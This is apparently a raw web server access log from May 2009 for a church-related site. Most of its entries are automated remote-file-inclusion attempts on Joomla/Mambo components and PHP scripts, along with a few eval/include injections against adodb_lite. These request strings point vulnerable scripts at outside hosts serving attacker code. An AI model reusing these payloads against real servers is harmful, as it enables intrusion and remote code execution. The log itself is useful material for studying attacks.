121.165.73.157 - - [31/May/2009:20:08:13 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
121.165.73.157 - - [31/May/2009:20:08:13 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
121.165.73.157 - - [31/May/2009:20:08:13 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
121.165.73.157 - - [31/May/2009:20:12:28 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
121.165.73.157 - - [31/May/2009:20:13:05 -0400] "GET /log/sdaglobal.org-access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
121.165.73.157 - - [31/May/2009:20:13:30 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
121.165.73.157 - - [31/May/2009:20:14:10 -0400] "GET /log/sdaglobal.org-access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
115.145.170.177 - - [31/May/2009:20:14:11 -0400] "GET /log/sdaglobal.org-access_log//?_zb_path=http://122.153.73.70/di?? HTTP/1.1" 404 311
115.145.170.177 - - [31/May/2009:20:14:13 -0400] "GET //?_zb_path=http://122.153.73.70/di?? HTTP/1.1" 200 9432
115.145.170.177 - - [31/May/2009:20:14:14 -0400] "GET /log//?_zb_path=http://122.153.73.70/di?? HTTP/1.1" 200 58362
121.165.73.157 - - [31/May/2009:20:14:58 -0400] "GET /log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt??? HTTP/1.1" 404 340
121.165.73.157 - - [31/May/2009:20:14:59 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt??? HTTP/1.1" 404 369
69.72.219.234 - - [31/May/2009:20:15:00 -0400] "GET /?sourcedir=http://www.festzim.com/festzim/idpriv8.txt?? HTTP/1.1" 200 9432
69.72.219.234 - - [31/May/2009:20:15:01 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://www.festzim.com/festzim/idpriv8.txt?? HTTP/1.1" 404 312
69.10.135.205 - - [31/May/2009:20:15:04 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:20:15:04 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:20:15:04 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.72.219.234 - - [31/May/2009:20:15:05 -0400] "GET /log/?sourcedir=http://www.festzim.com/festzim/idpriv8.txt?? HTTP/1.1" 200 58358
69.72.219.234 - - [31/May/2009:20:15:14 -0400] "GET /log/sdaglobal.org-access_log.4/?sourcedir=http://www.festzim.com/festzim/idpriv8.txt?? HTTP/1.1" 404 312
121.165.73.157 - - [31/May/2009:20:15:29 -0400] "GET /log/sdaglobal.org-error_log.4%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt??? HTTP/1.1" 404 368
65.55.106.203 - - [31/May/2009:20:16:44 -0400] "GET /robots.txt HTTP/1.1" 404 291
69.10.135.205 - - [31/May/2009:20:16:53 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
222.239.76.25 - - [31/May/2009:20:17:30 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
222.239.76.25 - - [31/May/2009:20:17:30 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
222.239.76.25 - - [31/May/2009:20:17:30 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362
65.55.106.203 - - [31/May/2009:20:17:56 -0400] "GET /log/chinese.sdaglobal.org-access_log.1 HTTP/1.1" 200 4616507
210.116.102.163 - - [31/May/2009:20:19:03 -0400] "GET //playing.php?commonpath=http://122.153.73.70/di?? HTTP/1.1" 404 293
219.117.223.106 - - [31/May/2009:20:20:23 -0400] "GET /modify.php?dir_module=http://backs.thewomanizer.net/remember.txt??? HTTP/1.0" 404 291
219.117.223.106 - - [31/May/2009:20:20:23 -0400] "GET /log/modify.php?dir_module=http://backs.thewomanizer.net/remember.txt??? HTTP/1.0" 404 295
219.117.223.106 - - [31/May/2009:20:20:31 -0400] "GET /log/sdaglobal.org-access_log.4/modify.php?dir_module=http://backs.thewomanizer.net/remember.txt??? HTTP/1.0" 404 322
69.10.135.205 - - [31/May/2009:20:21:10 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:20:21:10 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:20:21:10 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
121.165.73.157 - - [31/May/2009:20:22:02 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362
121.165.73.157 - - [31/May/2009:20:22:06 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 362
69.10.135.205 - - [31/May/2009:20:23:04 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
89.234.63.110 - - [31/May/2009:20:25:04 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 346
89.234.63.110 - - [31/May/2009:20:25:04 -0400] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 319
89.234.63.110 - - [31/May/2009:20:25:04 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 315
89.234.63.110 - - [31/May/2009:20:25:11 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 315
89.234.63.110 - - [31/May/2009:20:25:11 -0400] "GET /log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 319
89.234.63.110 - - [31/May/2009:20:25:11 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 346
89.234.63.110 - - [31/May/2009:20:27:45 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 348
193.252.149.14 - - [31/May/2009:20:27:51 -0400] "GET /robots.txt HTTP/1.1" 404 291
89.234.63.110 - - [31/May/2009:20:28:00 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 348
193.252.149.14 - - [31/May/2009:20:28:03 -0400] "GET / HTTP/1.1" 200 9432
66.11.230.36 - - [31/May/2009:20:30:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 333
66.11.230.36 - - [31/May/2009:20:30:16 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 337
66.11.230.36 - - [31/May/2009:20:30:17 -0400] "GET /log/sdaglobal.org-error_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 365
89.234.63.110 - - [31/May/2009:20:31:09 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 348
89.234.63.110 - - [31/May/2009:20:31:57 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 348
219.117.223.106 - - [31/May/2009:20:32:33 -0400] "GET /log/sdaglobal.org-access_log.4/modify.php?dir_module=http://backs.thewomanizer.net/remember.txt??? HTTP/1.0" 404 322
89.234.63.110 - - [31/May/2009:20:33:46 -0400] "GET /log/sdaglobal.org-access_log.4/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 346
89.234.63.110 - - [31/May/2009:20:34:10 -0400] "GET /log/sdaglobal.org-access_log.4/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 346
213.171.225.234 - - [31/May/2009:20:34:44 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.vietnamngaymai.org/ngaymai//modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 321
213.171.225.234 - - [31/May/2009:20:34:44 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.vietnamngaymai.org/ngaymai//modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 321
124.0.146.100 - - [31/May/2009:20:35:37 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 333
124.0.146.100 - - [31/May/2009:20:35:37 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 337
124.0.146.100 - - [31/May/2009:20:35:37 -0400] "GET /log/sdaglobal.org-access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 364
213.171.225.234 - - [31/May/2009:20:37:04 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.vietnamngaymai.org/ngaymai//modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 321
124.0.146.100 - - [31/May/2009:20:39:13 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 366
124.0.146.100 - - [31/May/2009:20:39:13 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 333
124.0.146.100 - - [31/May/2009:20:39:13 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 337
66.11.230.36 - - [31/May/2009:20:39:56 -0400] "GET /log/sdaglobal.org-error_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 363
124.0.146.100 - - [31/May/2009:20:40:09 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 333
124.0.146.100 - - [31/May/2009:20:40:09 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 366
124.0.146.100 - - [31/May/2009:20:40:09 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 337
124.0.146.100 - - [31/May/2009:20:40:31 -0400] "GET /log/sdaglobal.org-access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 364
200.54.154.10 - - [31/May/2009:20:43:52 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 321
200.54.154.10 - - [31/May/2009:20:43:52 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 321
66.11.230.36 - - [31/May/2009:20:44:05 -0400] "GET /components/com_forum/search.php?phpbb_root_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 312
66.11.230.36 - - [31/May/2009:20:44:05 -0400] "GET /log/components/com_forum/search.php?phpbb_root_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 316
66.11.230.36 - - [31/May/2009:20:44:05 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_forum/search.php?phpbb_root_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 345
200.54.154.10 - - [31/May/2009:20:44:09 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 321
69.10.135.205 - - [31/May/2009:20:44:17 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:20:44:17 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
69.10.135.205 - - [31/May/2009:20:44:17 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:20:44:23 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:20:44:23 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:20:44:23 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
66.11.230.36 - - [31/May/2009:20:44:36 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_forum/search.php?phpbb_root_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 345
213.171.225.234 - - [31/May/2009:20:44:39 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.vietnamngaymai.org/ngaymai//modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 321
124.0.146.100 - - [31/May/2009:20:44:52 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 324
124.0.146.100 - - [31/May/2009:20:44:59 -0400] "GET /log/components/com_simpleboard/image_upload.php?sbp=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 328
124.0.146.100 - - [31/May/2009:20:44:59 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_simpleboard/image_upload.php?sbp=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 355
69.10.135.205 - - [31/May/2009:20:45:14 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
213.246.62.35 - - [31/May/2009:20:45:30 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 308
213.246.62.35 - - [31/May/2009:20:45:30 -0400] "GET /log/mark.hitechemall.com-access_log.2//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 346
69.10.135.205 - - [31/May/2009:20:45:30 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:20:45:30 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:20:45:30 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
213.246.62.35 - - [31/May/2009:20:45:31 -0400] "GET /log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 312
69.10.135.205 - - [31/May/2009:20:45:35 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
69.10.135.205 - - [31/May/2009:20:45:45 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:20:45:45 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:20:45:45 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
213.246.62.35 - - [31/May/2009:20:45:46 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 308
213.246.62.35 - - [31/May/2009:20:45:46 -0400] "GET /log/sdaglobal.org-access_log.4//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 339
213.246.62.35 - - [31/May/2009:20:45:47 -0400] "GET /log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 312
203.22.204.193 - - [31/May/2009:20:46:04 -0400] "GET //skin/zero_vote/error.php?dir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 306
69.10.135.205 - - [31/May/2009:20:46:09 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
69.10.135.205 - - [31/May/2009:20:46:17 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:20:46:17 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:20:46:17 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
124.0.146.100 - - [31/May/2009:20:46:33 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 364
124.0.146.100 - - [31/May/2009:20:46:42 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 364
124.0.146.100 - - [31/May/2009:20:46:49 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 362
69.10.135.205 - - [31/May/2009:20:46:59 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
213.246.62.35 - - [31/May/2009:20:47:01 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 339
69.10.135.205 - - [31/May/2009:20:47:09 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:20:47:09 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
69.10.135.205 - - [31/May/2009:20:47:09 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
200.54.154.10 - - [31/May/2009:20:47:11 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 321
69.10.135.205 - - [31/May/2009:20:47:13 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 362
203.22.204.193 - - [31/May/2009:20:47:53 -0400] "GET /log/sdaglobal.org-access_log.1//skin/zero_vote/error.php?dir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 337
203.22.204.193 - - [31/May/2009:20:47:53 -0400] "GET //skin/zero_vote/error.php?dir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 306
203.22.204.193 - - [31/May/2009:20:47:54 -0400] "GET /log//skin/zero_vote/error.php?dir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 310
124.0.146.100 - - [31/May/2009:20:49:16 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 357
200.54.154.10 - - [31/May/2009:20:49:47 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 321
200.54.154.10 - - [31/May/2009:20:50:09 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 321
124.0.146.100 - - [31/May/2009:20:55:38 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 357
200.54.154.10 - - [31/May/2009:20:56:39 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 321
200.54.154.10 - - [31/May/2009:20:56:43 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 321
66.249.72.107 - - [31/May/2009:20:57:57 -0400] "GET /log/error_log.4 HTTP/1.1" 304 -
125.247.60.3 - - [31/May/2009:21:01:11 -0400] "GET //?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 200 9432
125.247.60.3 - - [31/May/2009:21:01:14 -0400] "GET /log/sdaglobal.org-access_log%20%20//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 313
125.247.60.3 - - [31/May/2009:21:01:19 -0400] "GET /log//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 200 58362
77.232.66.20 - - [31/May/2009:21:01:36 -0400] "GET /mygallerybrowser.php?myPath=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 301
77.232.66.20 - - [31/May/2009:21:01:36 -0400] "GET /log/sdaglobal.org-access_log%20%20/mygallerybrowser.php?myPath=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 332
77.232.66.20 - - [31/May/2009:21:01:36 -0400] "GET /log/mygallerybrowser.php?myPath=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 305
69.10.135.205 - - [31/May/2009:21:03:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:03:16 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:03:16 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
125.247.60.3 - - [31/May/2009:21:04:03 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 315
69.10.135.205 - - [31/May/2009:21:05:09 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 333
69.10.135.205 - - [31/May/2009:21:05:09 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 337
69.10.135.205 - - [31/May/2009:21:05:09 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vedicschool.com/amember/admin/id1.txt? HTTP/1.1" 404 364
75.162.55.241 - - [31/May/2009:21:07:41 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
75.162.55.241 - - [31/May/2009:21:07:41 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
66.249.72.107 - - [31/May/2009:21:08:21 -0400] "GET /log/twchurch.sdaglobal.org-access_log.2 HTTP/1.1" 200 14855
203.22.204.193 - - [31/May/2009:21:09:21 -0400] "GET /log/sdaglobal.org-access_log.4//skin/zero_vote/error.php?dir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 337
77.232.66.20 - - [31/May/2009:21:12:24 -0400] "GET /log/sdaglobal.org-access_log/mygallerybrowser.php?myPath=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 330
59.148.224.151 - - [31/May/2009:21:18:19 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
